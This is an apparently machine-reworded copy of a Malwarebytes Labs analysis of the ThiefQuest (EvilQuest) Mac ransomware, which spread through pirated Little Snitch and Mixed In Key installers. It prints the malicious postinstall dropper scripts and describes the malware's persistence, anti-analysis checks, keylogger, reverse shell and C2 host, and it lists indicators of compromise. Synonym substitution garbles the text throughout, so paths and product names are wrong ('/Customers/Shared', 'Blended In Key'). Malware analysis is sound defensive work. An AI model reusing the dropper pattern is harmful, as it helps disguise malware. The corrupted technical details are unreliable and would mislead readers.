New Mac Ransomware Exploiting through Piratery-Malwarebytes Labs

We analyze a brand new Mac ransomware that seems to encrypt consumer recordsdata with a little bit of a time delay.

Editor’s notice: The unique identify for the malware, EvilQuest, has been modified on account of a reliable sport of the identical identify from 2012. The brand new identify, ThiefQuest, can also be extra becoming for our up to date understanding of the malware.

A Twitter consumer going by the deal with @beatsballert messaged me yesterday after studying of an apparently malicious Little Snitch installer accessible for obtain on a Russian discussion board devoted to sharing torrent hyperlinks. A put up provided a torrent obtain for Little Snitch, and was quickly adopted by numerous feedback that the obtain included malware. The truth is, we found that not solely was it malware, however a brand new Mac ransomware variant spreading through piracy.

RUTracker put up exhibiting magnet hyperlink to malicious installer

Set up

Evaluation of this installer confirmed that there was positively one thing unusual happening. To start out, the reliable Little Snitch installer is attractively and professionally packaged, with a well-made customized installer that’s correctly code signed. Nonetheless, this installer was a easy Apple installer package deal with a generic icon. Worse, the installer package deal was pointlessly distributed inside a disk picture file.

Malicious Little Snitch installer

Inspecting this installer revealed that it will set up what turned out to be the reliable Little Snitch installer and uninstaller apps, in addition to an executable file named “patch”, into the /Customers/Shared/ listing.

Recordsdata put in

The installer additionally contained a postinstall script—a shell script that’s executed after the set up course of is accomplished. It’s regular for one of these installer to include preinstall and/or postinstall scripts, for preparation and cleanup, however on this case the script was used to load the malware after which launch the reliable Little Snitch installer.

mkdir /Library/LittleSnitchd

mv /Customers/Shared/Utils/patch /Library/LittleSnitchd/CrashReporter
rmdir /Customers/Shared/Utils

chmod +x /Library/LittleSnitchd/CrashReporter

open /Customers/Shared/ &

The script strikes the patch file right into a location that seems to be associated to LittleSnitch and renames it to CrashReporter. As there’s a reliable course of that’s a part of macOS named Crash Reporter, this identify will mix in fairly properly if seen in Exercise Monitor. It then removes itself from the /Customers/Shared/ folder and launches the brand new copy. Lastly, it launches the Little Snitch installer.

In follow, this didn’t work very properly. The malware acquired put in, however the try and run the Little Snitch installer acquired hung up indefinitely, till I ultimately compelled it to stop. Additional, the malware didn’t truly begin encrypting something, even though I let it run for some time with some decoy paperwork in place as prepared victims.

Whereas ready for the malware to do one thing—something!—additional investigation turned up a further malicious installer, for some DJ software program known as Blended In Key 8, in addition to hints {that a} malicious Ableton Stay installer additionally exists (though such an installer has not but been discovered). There are undoubtedly different installers floating round as properly that haven’t been seen.

The Blended In Key installer turned out to be fairly comparable, although with barely totally different file names and postinstall script.

mkdir /Library/mixednkey

mv /Purposes/Utils/patch /Library/mixednkey/toolroomd
rmdir /Utility/Utils

chmod +x /Library/mixednkey/toolroomd

/Library/mixednkey/toolroomd &

This one didn’t embody code to launch a reliable installer, and easily dropped the Blended In Key app into the Purposes folder instantly.

An infection

As soon as the an infection was triggered by the installer, the malware started spreading itself fairly liberally across the laborious drive. Each variants put in copies of the patch file on the following places:


It additionally arrange persistence through launch agent and daemon plist recordsdata:


The latter in every group of recordsdata, present in /non-public/var/root/, is more likely to be on account of a bug within the code that creates the recordsdata within the consumer folder, resulting in creation of the recordsdata within the root consumer’s folder. Because it’s fairly uncommon for anybody to really log in as root, this doesn’t serve any sensible goal.

Unusually, the malware additionally copied itself to the next recordsdata:


The latter was equivalent to the unique patch file, however the former was modified in a really unusual method. It contained a duplicate of the patch file, with a second copy of the info from that file appended to the tip, adopted by a further 9 bytes: the hexidecimal string 03705701 00CEFAAD DE. It’s not but recognized what the aim of those recordsdata or this extra appended knowledge is.

Much more weird—and nonetheless inexplicable—was the truth that the malware additionally modified the next recordsdata:


These recordsdata are all executable recordsdata which can be a part of GoogleSoftwareUpdate, that are mostly discovered put in on account of having Google Chrome put in on the machine. These recordsdata had the content material of the patch file prepended to them, which in fact would imply that the malicious code would run when any of those recordsdata is executed. Nonetheless, Chrome will see that the recordsdata have been modified, and can substitute the modified recordsdata with clear copies as quickly because it runs, so it’s unclear what the aim right here is.


The malware put in through the Blended In Key installer was equally reticent to begin encrypting recordsdata for me. I left it working on an actual machine for a while with no outcomes, then began enjoying with the system clock. After setting it forward three days, disconnecting from the community, and restarting the pc a pair occasions, it lastly started encrypting recordsdata.

The malware wasn’t notably good about what recordsdata it encrypted, nonetheless. It appeared to encrypt numerous settings recordsdata and different knowledge recordsdata, such because the keychain recordsdata. This resulted in an error message when logging in post-encryption.

Error displayed after the keychain was encrypted by the ransomware

There have been different very apparent indications of error, such because the Dock resetting to its default look.

The Finder additionally started exhibiting indicators of hassle, with spinning beachballs steadily showing when choosing an encrypted file. Different apps would additionally freeze periodically, however the Finder freezes might solely be managed by drive quitting the Finder.

Though others have reported {that a} file is created with directions on paying the ransom, in addition to an alert proven, and even text-to-speech used to tell the consumer they’ve been contaminated with ransomware, I used to be unable to duplicate any of those, regardless of ready fairly some time for the ransomware to complete.

Screenshot of encryption message posted to RUTracker discussion board


The malware consists of some anti-analysis strategies, present in capabilities named is_debugging and is_virtual_mchn. That is widespread with malware, as having a debugger connected to the method or being run inside a digital machine are each indications {that a} malware researcher is analyzing it. In such circumstances, malware will usually not show its full capabilities.

In a weblog put up on Goal-See, Patrick Wardle outlined the small print of how these two routines work. The is_virtual_mchn operate truly doesn’t seem to examine to see if the malware is working in a digital machine, however slightly tries to catch a VM within the means of adjusting time. It’s common for malware to incorporate delays. For instance, the primary ever Mac ransomware, KeRanger, included a 3 day delay between when it contaminated the system and when it started encrypting recordsdata. This helps to disguise the supply of the malware, because the malicious habits might not be instantly related to a program put in three days earlier than.

This, plus the truth that the malware consists of capabilities with names like ei_timer_create, ei_timer_start, and ei_timer_check, in all probability signifies that the malware runs on a time delay, though it’s not but recognized what that delay is.

Patrick additionally factors out that the malware seems to incorporate a keylogger, on account of presence of calls to CGEventTapCreate, which is a system routine that permits for monitoring of occasions like keystrokes. What the malware does with this functionality isn’t recognized. It additionally opens a reverse shell to a command and management (C2) server.

Open questions

There are nonetheless numerous open questions that will likely be answered by means of additional evaluation. For instance, what sort of encryption does this malware use? Is it safe, or will or not it’s straightforward to crack (as within the case of decrypting recordsdata encrypted by the FindZip ransomware)? Will or not it’s reversible, or is the encryption key by no means communicated again to the criminals behind it (additionally like FindZip)?

There’s nonetheless extra to be discovered, and we’ll replace this put up as extra turns into recognized.


In case you get contaminated with this malware, you’ll wish to do away with it as rapidly as potential. Malwarebytes for Mac will detect this malware as OSX.ThiefQuest and take away it.

In case your recordsdata get encrypted, we’re unsure how dire a scenario that’s. It depends upon the encryption and the way the keys are dealt with. It’s potential that additional analysis might result in a technique for decrypting recordsdata, and it’s additionally potential that gained’t occur.

The easiest way of avoiding the implications of ransomware is to take care of a superb set of backups. Maintain a minimum of two backup copies of all necessary knowledge, and a minimum of one shouldn’t be saved connected to your Mac always. (Ransomware could attempt to encrypt or harm backups on related drives.)

I personally have a number of laborious drives for backups. I exploit Time Machine to take care of a pair, and Carbon Copy Cloner to take care of a pair extra. One of many backups is all the time within the protected deposit field on the financial institution, and I swap them periodically, in order that worst case situation, I all the time have fairly latest knowledge saved in a protected location.

If in case you have good backups, ransomware isn’t any menace to you. At worst, you possibly can merely erase the laborious drive and restore from a clear backup. Plus, these backups additionally defend you in opposition to issues like drive failure, theft, destruction of your gadget, and so on.

Indicators of Compromise


patch (and

Little Snitch 4.5.2.dmg

Blended In Key 8.dmg


C2 server
C2 tackle obtained from andrewka6.pythonanywhere[.]com

You May Also Like